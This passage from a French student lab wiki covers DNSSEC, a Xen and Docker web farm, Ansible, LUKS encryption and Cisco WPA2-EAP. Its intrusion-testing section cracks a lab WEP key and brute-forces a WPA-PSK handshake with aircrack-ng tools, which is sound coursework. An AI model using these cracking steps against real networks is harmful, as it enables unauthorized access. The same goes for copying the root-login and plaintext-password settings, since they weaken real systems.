   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 all:                                        # le groupe de machine racine c'est à dire tout&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:                                   # groupe d'hôtes contenant seulement notre VM privée&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:                               # groupe d'hôtes contenant toutes les VMs privées (la ferme de serveurs Web)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
  ntp-client:                                # groupe cible pour le déploiement de clients ntp (notre VM privée)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.2&lt;br /&gt;
  ntp-server:                                # groupe cible pour le déploiement de serveurs ntp (notre VM Publique)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.12&lt;br /&gt;
&lt;br /&gt;
On peut tester notre ferme de serveurs&lt;br /&gt;
 root@mycoplasma:/etc/ansible# ansible serveur-web -m ping -o&lt;br /&gt;
 192.168.0.3 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.2 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.4 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.1 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.5 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.6 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52081</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52081"/>
				<updated>2020-01-14T21:01:33Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Hosts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
